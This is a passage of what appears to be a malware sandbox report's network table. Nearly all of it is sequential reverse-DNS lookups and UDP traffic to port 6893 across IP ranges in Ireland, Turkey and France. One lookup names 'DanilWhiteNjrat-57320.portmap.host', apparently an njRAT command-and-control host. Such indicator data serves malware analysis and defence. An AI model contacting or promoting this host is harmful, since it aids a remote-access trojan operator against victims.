| US | 8.8.8.8:53 | 245.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 255.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.114.218.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 255.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | DanilWhiteNjrat-57320.portmap.host | udp |
| US | 8.8.8.8:53 | 6.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 255.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 255.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.193.25.171.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| IE | 93.107.12.0:6893 | udp | |
| IE | 93.107.12.1:6893 | udp | |
| IE | 93.107.12.2:6893 | udp | |
| IE | 93.107.12.3:6893 | udp | |
| IE | 93.107.12.4:6893 | udp | |
| IE | 93.107.12.5:6893 | udp | |
| IE | 93.107.12.6:6893 | udp | |
| IE | 93.107.12.7:6893 | udp | |
| IE | 93.107.12.8:6893 | udp | |
| IE | 93.107.12.9:6893 | udp | |
| IE | 93.107.12.10:6893 | udp | |
| IE | 93.107.12.11:6893 | udp | |
| IE | 93.107.12.12:6893 | udp | |
| IE | 93.107.12.13:6893 | udp | |
| IE | 93.107.12.14:6893 | udp | |
| IE | 93.107.12.15:6893 | udp | |
| IE | 93.107.12.16:6893 | udp | |
| IE | 93.107.12.17:6893 | udp | |
| IE | 93.107.12.18:6893 | udp | |
| IE | 93.107.12.19:6893 | udp | |
| IE | 93.107.12.20:6893 | udp | |
| IE | 93.107.12.21:6893 | udp | |
| IE | 93.107.12.22:6893 | udp | |
| IE | 93.107.12.23:6893 | udp | |
| IE | 93.107.12.24:6893 | udp | |
| IE | 93.107.12.25:6893 | udp | |
| IE | 93.107.12.26:6893 | udp | |
| IE | 93.107.12.27:6893 | udp | |
| IE | 93.107.12.28:6893 | udp | |
| IE | 93.107.12.29:6893 | udp | |
| IE | 93.107.12.30:6893 | udp | |
| IE | 93.107.12.31:6893 | udp | |
| TR | 95.1.200.0:6893 | udp | |
| TR | 95.1.200.1:6893 | udp | |
| TR | 95.1.200.2:6893 | udp | |
| TR | 95.1.200.3:6893 | udp | |
| TR | 95.1.200.4:6893 | udp | |
| TR | 95.1.200.5:6893 | udp | |
| TR | 95.1.200.6:6893 | udp | |
| TR | 95.1.200.7:6893 | udp | |
| TR | 95.1.200.8:6893 | udp | |
| TR | 95.1.200.9:6893 | udp | |
| TR | 95.1.200.10:6893 | udp | |
| TR | 95.1.200.11:6893 | udp | |
| TR | 95.1.200.12:6893 | udp | |
| TR | 95.1.200.13:6893 | udp | |
| TR | 95.1.200.14:6893 | udp | |
| TR | 95.1.200.15:6893 | udp | |
| TR | 95.1.200.16:6893 | udp | |
| TR | 95.1.200.17:6893 | udp | |
| TR | 95.1.200.18:6893 | udp | |
| TR | 95.1.200.19:6893 | udp | |
| TR | 95.1.200.20:6893 | udp | |
| TR | 95.1.200.21:6893 | udp | |
| TR | 95.1.200.22:6893 | udp | |
| TR | 95.1.200.23:6893 | udp | |
| TR | 95.1.200.24:6893 | udp | |
| TR | 95.1.200.25:6893 | udp | |
| TR | 95.1.200.26:6893 | udp | |
| TR | 95.1.200.27:6893 | udp | |
| TR | 95.1.200.28:6893 | udp | |
| TR | 95.1.200.29:6893 | udp | |
| TR | 95.1.200.30:6893 | udp | |
| TR | 95.1.200.31:6893 | udp | |
| FR | 87.98.176.0:6893 | udp | |
| FR | 87.98.176.1:6893 | udp | |
| FR | 87.98.176.2:6893 | udp | |
| FR | 87.98.176.3:6893 | udp | |
| FR | 87.98.176.4:6893 | udp | |
| FR | 87.98.176.5:6893 | udp | |
| FR | 87.98.176.6:6893 | udp | |
| FR | 87.98.176.7:6893 | udp | |
| FR | 87.98.176.8:6893 | udp | |
| FR | 87.98.176.9:6893 | udp | |
| FR | 87.98.176.10:6893 | udp | |
| FR | 87.98.176.11:6893 | udp | |
| FR | 87.98.176.12:6893 | udp | |
| FR | 87.98.176.13:6893 | udp | |
| FR | 87.98.176.14:6893 | udp | |
| FR | 87.98.176.15:6893 | udp | |
| FR | 87.98.176.16:6893 | udp | |
| FR | 87.98.176.17:6893 | udp | |
| FR | 87.98.176.18:6893 | udp | |
| FR | 87.98.176.19:6893 | udp | |
| FR | 87.98.176.20:6893 | udp | |
| FR | 87.98.176.21:6893 | udp | |
| FR | 87.98.176.22:6893 | udp | |
| FR | 87.98.176.23:6893 | udp | |
| FR | 87.98.176.24:6893 | udp | |
| FR | 87.98.176.25:6893 | udp | |
| FR | 87.98.176.26:6893 | udp | |
| FR | 87.98.176.27:6893 | udp | |
| FR | 87.98.176.28:6893 | udp | |
| FR | 87.98.176.29:6893 | udp | |
| FR | 87.98.176.30:6893 | udp | |
| FR | 87.98.176.31:6893 | udp | |
| FR | 87.98.176.32:6893 | udp | |
| FR | 87.98.176.33:6893 | udp | |
| FR | 87.98.176.34:6893 | udp | |
| FR | 87.98.176.35:6893 | udp | |
| FR | 87.98.176.36:6893 | udp | |
| FR | 87.98.176.37:6893 | udp | |
| FR | 87.98.176.38:6893 | udp | |
| FR | 87.98.176.39:6893 | udp | |
| FR | 87.98.176.40:6893 | udp | |
| FR | 87.98.176.41:6893 | udp | |
| FR | 87.98.176.42:6893 | udp | |
| FR | 87.98.176.43:6893 | udp | |
| FR | 87.98.176.44:6893 | udp | |
| FR | 87.98.176.45:6893 | udp | |
| FR | 87.98.176.46:6893 | udp | |
| FR | 87.98.176.47:6893 | udp | |
| FR | 87.98.176.48:6893 | udp | |
| FR | 87.98.176.49:6893 | udp | |
| FR | 87.98.176.50:6893 | udp | |
| FR | 87.98.176.51:6893 | udp | |
| FR | 87.98.176.52:6893 | udp | |
| FR | 87.98.176.53:6893 | udp | |
| FR | 87.98.176.54:6893 | udp | |
| FR | 87.98.176.55:6893 | udp | |
| FR | 87.98.176.56:6893 | udp | |
| FR | 87.98.176.57:6893 | udp | |
| FR | 87.98.176.58:6893 | udp | |
| FR | 87.98.176.59:6893 | udp | |
| FR | 87.98.176.60:6893 | udp | |
| FR | 87.98.176.61:6893 | udp | |
| FR | 87.98.176.62:6893 | udp | |
| FR | 87.98.176.63:6893 | udp | |
| FR | 87.98.176.64:6893 | udp | |
| FR | 87.98.176.65:6893 | udp | |
| FR | 87.98.176.66:6893 | udp | |
| FR | 87.98.176.67:6893 | udp | |
| FR | 87.98.176.68:6893 | udp | |
| FR | 87.98.176.69:6893 | udp | |
| FR | 87.98.176.70:6893 | udp | |
| FR | 87.98.176.71:6893 | udp | |
| FR | 87.98.176.72:6893 | udp | |
| FR | 87.98.176.73:6893 | udp | |
| FR | 87.98.176.74:6893 | udp | |
| FR | 87.98.176.75:6893 | udp | |
| FR | 87.98.176.76:6893 | udp | |
| FR | 87.98.176.77:6893 | udp | |
| FR | 87.98.176.78:6893 | udp | |
| FR | 87.98.176.79:6893 | udp | |
| FR | 87.98.176.80:6893 | udp | |
| FR | 87.98.176.81:6893 | udp | |
| FR | 87.98.176.82:6893 | udp | |
| FR | 87.98.176.83:6893 | udp | |
| FR | 87.98.176.84:6893 | udp | |
| FR | 87.98.176.85:6893 | udp | |
| FR | 87.98.176.86:6893 | udp | |
| FR | 87.98.176.87:6893 | udp | |
| FR | 87.98.176.88:6893 | udp | |
| FR | 87.98.176.89:6893 | udp | |
| FR | 87.98.176.90:6893 | udp | |
| FR | 87.98.176.91:6893 | udp | |
| FR | 87.98.176.92:6893 | udp | |
| FR | 87.98.176.93:6893 | udp | |
| FR | 87.98.176.94:6893 | udp | |
| FR | 87.98.176.95:6893 | udp | |
| FR | 87.98.176.96:6893 | udp | |
| FR | 87.98.176.97:6893 | udp | |
| FR | 87.98.176.98:6893 | udp | |
| FR | 87.98.176.99:6893 | udp | |
| FR | 87.98.176.100:6893 | udp | |
| FR | 87.98.176.101:6893 | udp | |
| FR | 87.98.176.102:6893 | udp | |
| FR | 87.98.176.103:6893 | udp | |
| FR | 87.98.176.104:6893 | udp | |
| FR | 87.98.176.105:6893 | udp | |
| FR | 87.98.176.106:6893 | udp | |
| FR | 87.98.176.107:6893 | udp | |
| FR | 87.98.176.108:6893 | udp | |
| FR | 87.98.176.109:6893 | udp | |
| FR | 87.98.176.110:6893 | udp | |
| FR | 87.98.176.111:6893 | udp | |
| FR | 87.98.176.112:6893 | udp | |
| FR | 87.98.176.113:6893 | udp | |
| FR | 87.98.176.114:6893 | udp | |
| FR | 87.98.176.115:6893 | udp | |
| FR | 87.98.176.116:6893 | udp | |
| FR | 87.98.176.117:6893 | udp | |
| FR | 87.98.176.118:6893 | udp | |
| FR | 87.98.176.119:6893 | udp | |
| FR | 87.98.176.120:6893 | udp | |
| FR | 87.98.176.121:6893 | udp | |
| FR | 87.98.176.122:6893 | udp | |
| FR | 87.98.176.123:6893 | udp | |
| FR | 87.98.176.124:6893 | udp | |
| FR | 87.98.176.125:6893 | udp | |
| FR | 87.98.176.126:6893 | udp | |
| FR | 87.98.176.127:6893 | udp | |
| FR | 87.98.176.128:6893 | udp | |
| FR | 87.98.176.129:6893 | udp | |
| FR | 87.98.176.130:6893 | udp | |
| FR | 87.98.176.131:6893 | udp | |
| FR | 87.98.176.132:6893 | udp | |
| FR | 87.98.176.133:6893 | udp | |
| FR | 87.98.176.134:6893 | udp | |
| FR | 87.98.176.135:6893 | udp | |
| FR | 87.98.176.136:6893 | udp | |
| FR | 87.98.176.137:6893 | udp | |
| FR | 87.98.176.138:6893 | udp | |
| FR | 87.98.176.139:6893 | udp | |
| FR | 87.98.176.140:6893 | udp | |
| FR | 87.98.176.141:6893 | udp | |
| FR | 87.98.176.142:6893 | udp | |
| FR | 87.98.176.143:6893 | udp | |
| FR | 87.98.176.144:6893 | udp | |
| FR | 87.98.176.145:6893 | udp | |
| FR | 87.98.176.146:6893 | udp | |
| FR | 87.98.176.147:6893 | udp | |
| FR | 87.98.176.148:6893 | udp | |
| FR | 87.98.176.149:6893 | udp | |
| FR | 87.98.176.150:6893 | udp | |
| FR | 87.98.176.151:6893 | udp | |
| FR | 87.98.176.152:6893 | udp | |
| FR | 87.98.176.153:6893 | udp | |
| FR | 87.98.176.154:6893 | udp | |
| FR | 87.98.176.155:6893 | udp | |
| FR | 87.98.176.156:6893 | udp | |
| FR | 87.98.176.157:6893 | udp | |
| FR | 87.98.176.158:6893 | udp | |
| FR | 87.98.176.159:6893 | udp | |
| FR | 87.98.176.160:6893 | udp | |
| FR | 87.98.176.161:6893 | udp | |
| FR | 87.98.176.162:6893 | udp | |
| FR | 87.98.176.163:6893 | udp | |
| FR | 87.98.176.164:6893 | udp | |
| FR | 87.98.176.165:6893 | udp | |
| FR | 87.98.176.166:6893 | udp | |
| FR | 87.98.176.167:6893 | udp | |
| FR | 87.98.176.168:6893 | udp | |
| FR | 87.98.176.169:6893 | udp | |
| FR | 87.98.176.170:6893 | udp | |
| FR | 87.98.176.171:6893 | udp | |
| FR | 87.98.176.172:6893 | udp | |
| FR | 87.98.176.173:6893 | udp | |
| FR | 87.98.176.174:6893 | udp | |
| FR | 87.98.176.175:6893 | udp | |
| FR | 87.98.176.176:6893 | udp | |
| FR | 87.98.176.177:6893 | udp | |
| FR | 87.98.176.178:6893 | udp | |
| FR | 87.98.176.179:6893 | udp | |
| FR | 87.98.176.180:6893 | udp | |
| FR | 87.98.176.181:6893 | udp | |
| FR | 87.98.176.182:6893 | udp | |
| FR | 87.98.176.183:6893 | udp | |
| FR | 87.98.176.184:6893 | udp | |
| FR | 87.98.176.185:6893 | udp | |
| FR | 87.98.176.186:6893 | udp | |
| FR | 87.98.176.187:6893 | udp | |
| FR | 87.98.176.188:6893 | udp | |
| FR | 87.98.176.189:6893 | udp | |
| FR | 87.98.176.190:6893 | udp | |
| FR | 87.98.176.191:6893 | udp | |
| FR | 87.98.176.192:6893 | udp | |
| FR | 87.98.176.193:6893 | udp | |
| FR | 87.98.176.194:6893 | udp | |
| FR | 87.98.176.195:6893 | udp | |
| FR | 87.98.176.196:6893 | udp | |
| FR | 87.98.176.197:6893 | udp | |
| FR | 87.98.176.198:6893 | udp | |
| FR | 87.98.176.199:6893 | udp | |
| FR | 87.98.176.200:6893 | udp | |
| FR | 87.98.176.201:6893 | udp | |
| FR | 87.98.176.202:6893 | udp | |
